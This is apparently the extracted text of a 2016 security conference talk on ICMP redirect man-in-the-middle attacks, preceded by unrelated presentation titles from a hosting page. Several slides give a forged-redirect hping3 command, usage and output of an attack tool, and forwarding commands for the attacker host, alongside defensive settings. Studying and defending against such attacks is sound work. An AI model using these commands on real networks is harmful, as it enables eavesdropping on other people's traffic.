AI Trends in Creative Operations 2024 by Artwork Flow.pdfAI Trends in Creative Operations 2024 by Artwork Flow.pdf
AI Trends in Creative Operations 2024 by Artwork Flow.pdf
Β 
Skeleton Culture Code
Skeleton Culture CodeSkeleton Culture Code
Skeleton Culture Code
Β 
PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024PEPSICO Presentation to CAGNY Conference Feb 2024
PEPSICO Presentation to CAGNY Conference Feb 2024
Β 
Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)Content Methodology: A Best Practices Report (Webinar)
Content Methodology: A Best Practices Report (Webinar)
Β 
How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024How to Prepare For a Successful Job Search for 2024
How to Prepare For a Successful Job Search for 2024
Β 
Social Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie InsightsSocial Media Marketing Trends 2024 // The Global Indie Insights
Social Media Marketing Trends 2024 // The Global Indie Insights
Β 
Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024Trends In Paid Search: Navigating The Digital Landscape In 2024
Trends In Paid Search: Navigating The Digital Landscape In 2024
Β 
5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary5 Public speaking tips from TED - Visualized summary
5 Public speaking tips from TED - Visualized summary
Β 
ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd ChatGPT and the Future of Work - Clark Boyd
ChatGPT and the Future of Work - Clark Boyd
Β 
Getting into the tech field. what next
Getting into the tech field. what next Getting into the tech field. what next
Getting into the tech field. what next
Β 
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search IntentGoogle's Just Not That Into You: Understanding Core Updates & Search Intent
Google's Just Not That Into You: Understanding Core Updates & Search Intent
Β 
How to have difficult conversations
How to have difficult conversations How to have difficult conversations
How to have difficult conversations
Β 
Introduction to Data Science
Introduction to Data ScienceIntroduction to Data Science
Introduction to Data Science
Β 
Time Management & Productivity - Best Practices
Time Management & Productivity - Best PracticesTime Management & Productivity - Best Practices
Time Management & Productivity - Best Practices
Β 
The six step guide to practical project management
The six step guide to practical project managementThe six step guide to practical project management
The six step guide to practical project management
Β 
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Beginners Guide to TikTok for Search - Rachel Pearson - We are Tilt __ Bright...
Β 

Type=5, Code=1 (or Lady In The Middle)

  • 2. Disclaimer: Opinions expressed in this presentation are my own and do not represent those of my employer
  • 3. 3 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Poland Dorota Kulas Senior Red Teamer 15 years in IT 5 years security focused
  • 4. 4 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 An attacker may assume the MITM position by altering The Routing Table
  • 5. 5 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž First defined in RFC 792 in 1981 ο‚ž ISO/OSI Layer 3* ο‚ž Designed to provide feedback about problems in the communication environment ο‚ž ICMP messages typically report errors in the processing of IP datagrams ο‚ž These messages are directed to the source IP address of the originating packet*
  • 6. 6 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Internet Protocol Header 8 Bytes of Next Header Type Code Checksum (different purposes)
  • 7. 7 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Internet Header + 64 bits of Data Datagram The internet header plus the first 64 bits of the original datagram's data. This data is used by the host to match the message to the appropriate process. If a higher level protocol uses port numbers, they are assumed to be in the first 64 data bits of the original datagram's data. RFC 792
  • 8. 8 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 1 2 3 4 2a (ICMP Type=5, Code=1)
  • 9. 9 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 1 2 3
  • 10. 10 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 3 1 2
  • 11. 11 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž Attack works up to Windows XP ο‚ž Versions earlier than Yosemite (10.10.3) – attack works (untested; see CVE-2015-1103) ο‚ž Attack works for kernel versions prior to 2.6.38 root@attacker# hping3 -I <iface> -C 5 -K 1 -c <count> -a <current_gw> --icmp-ipdst <target> --icmp-gw <attacker> --icmp- ipsrc <victim> <victim>
  • 12. 12 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Changes introduced with 3.6.x kernels ο‚ž Checking if redirect packet OS received really comes from current (old) gateway for particular destination IP address ο‚ž Started using FIB instead of routing table (ip route list table local|main) ο‚ž ICMP redirects previously were handled in icmp.c, now redirect is being delivered and handled in respective protocols modules ο‚ž Redirects are validated using 8-byte part of embedded header
  • 13. 13 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Checking if redirect packet OS received really comes from current (old) gateway for particular destination IP address and using FIB instead of the routing table 682 if (rt->rt_gateway != old_gw) 683 return; 684 705 n = ipv4_neigh_lookup(&rt->dst, NULL, &new_gw); 706 if (n) { 707 if (!(n->nud_state & NUD_VALID)) { 708 neigh_event_send(n, NULL); 709 } else { 710 if (fib_lookup(net, fl4, &res) == 0) { 711 struct fib_nh *nh = &FIB_RES_NH(res); 712 713 update_or_create_fnhe(nh, fl4->daddr, new_gw, 714 0, 0); 715 } 716 if (kill_route) 717 rt->dst.obsolete = DST_OBSOLETE_KILL; 718 call_netevent_notifiers(NETEVENT_NEIGH_UPDATE, n); 719 } 720 neigh_release(n); 721 } 722 return;
  • 14. 14 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Handling ICMP redirect in TCP module diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c (…) +static void do_redirect(struct sk_buff *skb, struct sock *sk) +{ + struct dst_entry *dst = __sk_dst_check(sk, 0); + + if (dst && dst->ops->redirect) + dst->ops->redirect(dst, skb); +} + (…) switch (type) { + case ICMP_REDIRECT: + do_redirect(icmp_skb, sk); + goto out; diff --git a/net/ipv4/icmp.c b/net/ipv4/icmp.c (…) - ip_rt_redirect(skb, icmp_hdr(skb)->un.gateway); icmp_socket_deliver(skb, icmp_hdr(skb)->un.gateway); }
  • 15. 15 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Internet Header + 64 bits of Data Datagram The internet header plus the first 64 bits of the original datagram's data. This data is used by the host to match the message to the appropriate process. If a higher level protocol uses port numbers, they are assumed to be in the first 64 data bits of the original datagram's data. RFC 792
  • 16. 16 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 2 2 4 1 3 5
  • 17. 17 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Version IHL DSCP |ECN Flags Version IHL DSCP |ECN Flags 8 Bytes of Next Header Header ChecksumProtocolTTL Total Length ID Fragment Offset Source IP Address Destination IP Address Gateway Internet Address Type Code Checksum Total Length ID Source IP Address Destination IP Address TTL Protocol Header Checksum Fragment Offset 2 3
  • 18. 18 Type=5, Code=1 – Hack in Paris 2016 01/07/2016
  • 19. 19 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 = Default GW = User = Attacker = User = Remote Server = 5 = 1
  • 20. 20 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 = User = Remote Server = Remote Server = User 2 1
  • 21. 21 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž TCP ο‚ž UDP ο‚ž ICMP Echo Request/Reply Source Port Destination Port Sequence Number Source Port Destination Port Length Checksum Identifier Sequence Number Type=8 Code=0 Header Checksum Which of these can an attacker control? (check other protocols too)
  • 22. 22 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž ICMP Echo Request/Reply Identifier Sequence Number Type=8 Code=0 Header Checksum $ sudo tshark -n icmp 5 18.511051 10.10.100.39 -> 10.10.100.254 ICMP 98 Echo (ping) request id=0x9ea0, seq=0/0, ttl=64 6 18.511307 10.10.100.254 -> 10.10.100.39 ICMP 98 Echo (ping) reply id=0x9ea0, seq=0/0, ttl=64 (request in 5) $ pgrep ping 41118 >>> hex(41118) β€˜0xa09e’
  • 23. 23 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž Windows 7 – Attacker uses packet with appropriate (any) trigger ο‚ž Yosemite – In default configuration currently unable to exploit Kernels ο‚ž 2.6.38 – 3.5.x – packet with trigger (any) ο‚ž 3.6.x – 4.6.0 – packet with trigger (udp) ο‚ž All kernels except for 3.6.x – packet with trigger (icmp)
  • 24. 24 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž Prepare to route a lot of traffic through your host ο‚ž Permit IP forwarding and prepare forwarding rules as needed
  • 25. 25 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž Linux / Android ο‚ž Windows ο‚ž Mac OS X sudo sysctl -w net.ipv4.ip_forward=1 Or, as root echo 1 > sysctl -w net.ipv4.ip_forward=1 sudo sysctl -w net.inet.ip.forwarding=1 Reboot required: reg add HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParameters /v IpEnableRouter /t REG_DWORD /d 1 /f Or (reboot not required): sc start "RemoteAccess"
  • 26. 26 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 (A) (V) | | +--+--+ | (G) | (T) Usage: Script will send an ICMP recirect message (or, in fact, couple of network packets, in some cases in a loop). This is to introduce a new route entry to the attacked system. Victim (V) is other host within the same LAN segment (or L2 domain). Victim communicates to the target (T), and this is the connection attacker (A) wants to eavesdrop. The other piece attacker needs to know is default gateway (G) of the victim, typically it will be the same router that is attacker’s default gateway. For TCP, it is the best to choose port which is closed on the victim machine, as sequence number in response when the RST flag is set is always 0. For UDP, there's netbios_ns query implemented, it is the best when victim actually listens for these queries (most of windows machines do). The best approach is to use ICMP. Use other options if ICMP is not working. Example: redirect –A 10.10.10.12 –V 10.10.10.16 –T 4.4.4.4 –G 10.10.10.1
  • 27. 27 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Usage: redirect.go -A string [optional] attacker IP address (your primary network interface IP address by default) -D [optional] debug mode - very verbose -G string [required] IP address of the default gatway -T string [required] IP address of the target (may be on remote network) -V string [required] IP address of the victim (on the same LAN segment as an attacker) -c int [optional] clean up: 1 - set route back to default gw -cpuprofile string Where to write CPU profile -d int [optional] destination port of trigger packet (default 53) -f [optional] do not spoof source MAC address -i string [optional] interface to use -l float [optional] send packets in a loop at <number> interval (in seconds) -n int [optional] send number of packets if sending in a loop. Set it to -1 to send continously (this is the default) (default -1) -p [optional] send a redirect based on a ICMP trigger / ping (this is the default) (default true) -q [optional] quiet mode - won't print any messages -s int [optional] source port of trigger packet -t [optional] send a redirect based on a TCP trigger -u [optional] send a redirect based on a UDP trigger -x [optional] skip trigger
  • 28. 28 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 attacker$ sudo redirect –D -V 10.10.100.19 -G 10.10.100.254 -T 4.4.4.4 2015/09/04 17:45:57 Preparing packet from 10.10.100.254 to 10.10.100.19 to send via interface eth0 (gateway 10.10.100.254) 2015/09/04 17:45:57 Preparing packet from 4.4.4.4 to 10.10.100.19 to send via interface eth0 (gateway 10.10.100.254) Sending packets (will be redirecting to 10.10.100.5): i.r. victim$ sudo tshark –n –f icmp Capturing on 'eth0' 1 4.4.4.4 10.10.100.19 ICMP 60 0.000000 Echo (ping) request id=0x1756, seq=1/256, ttl=64 2 10.10.100.19 4.4.4.4 ICMP 60 0.001161 Echo (ping) reply id=0x1756, seq=1/256, ttl=64 (request in 1) 3 10.10.100.254 10.10.100.19 ICMP 70 0.000646 Redirect (Redirect for host) victim$ ip route get 4.4.4.4 4.4.4.4 via 10.10.100.5 dev eth0 src 10.10.100.19 cache <redirected>
  • 29. 29 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 attacker$ sudo redirect –D -V 10.10.100.19 -G 10.10.100.254 -T 4.4.4.4 –c 1 2015/09/04 17:47:18 Preparing packet from 10.10.100.5 to 10.10.100.19 to send via interface eth0 (gateway 10.10.100.254) 2015/09/04 17:47:18 Preparing packet from 4.4.4.4 to 10.10.100.19 to send via interface eth0 (gateway 10.10.100.254) Sending packets (will be redirecting to 10.10.100.254): i.r. victim$ sudo tshark –n –f icmp Capturing on 'eth0' 1 4.4.4.4 10.10.100.19 ICMP 60 0.000000 Echo (ping) request id=0x1856, seq=1/256, ttl=64 2 10.10.100.19 4.4.4.4 ICMP 60 0.001161 Echo (ping) reply id=0x1856, seq=1/256, ttl=64 (request in 1) 3 10.10.100.5 10.10.100.19 ICMP 70 0.000646 Redirect (Redirect for host) victim$ ip route get 4.4.4.4 4.4.4.4 via 10.10.100.254 dev eth0 src 10.10.100.19 cache <redirected>
  • 30. 30 Type=5, Code=1 – Hack in Paris 2016 01/07/2016
  • 31. 31 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 All OSes ο‚ž IP address of the gateway the compromised endpoint is used to communicate with target Linux kernels 3.6.x ο‚ž ongoing UDP communication between the compromised endpoint and the target, including source and destination ports
  • 32. 32 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž One-way MITM (traffic from compromised endpoint within your LAN to the target) – unless attacker implements NAT ο‚ž Attack only eligible within local subnet (but towards remote host outside of LAN)
  • 33. 33 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž Linux / Android ο‚ž Windows ο‚ž Mac OS X sudo sysctl -w net.ipv4.conf.all.accept_redirects=0 sudo sysctl -w net.ipv6.conf.all.accept_redirects=0 Or, as root echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects sudo sysctl -w net.inet.icmp.drop_redirect=1 sudo sysctl -w net.inet.icmp.log_redirect=1 sudo sysctl –w net.inet6.icmp6.rediraccept=0 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetservicesTcpipParameters Add value name EnableICMPRedirects, a type REG_DWORD entry, and set the data value to 0
  • 34. 34 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 ο‚ž Cisco ο‚— Port Security (to limit and identify MAC addresses of the stations allowed to access the port) ο‚— DHCP Snooping (acts like a firewall between untrusted hosts and DHCP servers; will drop spoofed packets) ο‚— IP Source Guard (filters traffic based on the DHCP snooping binding database and on manually configured IP source bindings in order to restrict IP traffic on non- routed Layer 2 interfaces. IP source guard prevents IP/MAC spoofing)
  • 35. 35 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 RFCs ο‚ž 729 – Internet Control Message Protocol ο‚ž 1122 – Requirements for Internet Hosts -- Communication Layers ο‚ž 1812 – Requirements for IP Version 4 Routers ο‚ž 5927 – ICMP Attacks against TCP ο‚ž 6864 – Updated Specification of the IPv4 ID Field Links ο‚ž https://blog.zimperium.com/doubledirect-zimperium-discovers-full-duplex- icmp-redirect-attacks-in-the-wild/ ο‚ž https://support.apple.com/en-us/HT204659 ο‚ž http://www.cisco.com/c/en/us/support/docs/ip/access-lists/13608- 21.html#anc104
  • 36. 36 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Kernel commits that changed ICMP Redirects handling ο‚ž https://git.kernel.org/cgit/linux/kernel/git/davem/net.git/diff/?id=55be7a9c6074f749d617a7fc1914 c9a23505438c ο‚ž https://git.kernel.org/cgit/linux/kernel/git/davem/net.git/diff/?id=1f42539d257af671d56d4bdbcf13a ef31abff6ef ο‚ž https://git.kernel.org/cgit/linux/kernel/git/davem/net.git/diff/?id=b42597e2f36e2043756aa7462fad df630962f061 ο‚ž https://git.kernel.org/cgit/linux/kernel/git/stable/linux- stable.git/commit/?id=791169e5924d35532443c9538e3ba0d49ef0de10 ο‚ž https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4895c771c7f006b4b90f9d6 b1d2210939ba57b38 ο‚ž http://article.gmane.org/gmane.linux.network/238256 Testing tool https://gitlab.com/litm/redirect Contact me dorotakulas (at) gmail
  • 37.
  • 38. 38 Type=5, Code=1 – Hack in Paris 2016 01/07/2016 Maciek is my brother. Few years ago, he was a happy young man in love, with dreams and plans for the future. This photo was taken a week before his accident. The accident happened in May 2013 and caused a swelling of the brain and hypoxia. The mortality rate for these injuries was set at 89%. The struggle for his life lasted more than two weeks. Maciek is a fighter – he survived. Unfortunately, he cannot move or speak. He is fed through a tube (PEG). Thanks to support of many people we were able to provide him a proper rehabilitation. Maciek made a great progress. He is now able to sit in a wheelchair, tries to eat with his mouth and makes first sounds. He communicates with us using eye movements. To further improve his abilities, we need a financial support for the rehabilitation and a rehabilitation equipment. Maciek is taken care of by my parents, 24x7. I’m helping as much as I can, also through spreading the information and asking for donations. http://maciejkulas.pl/en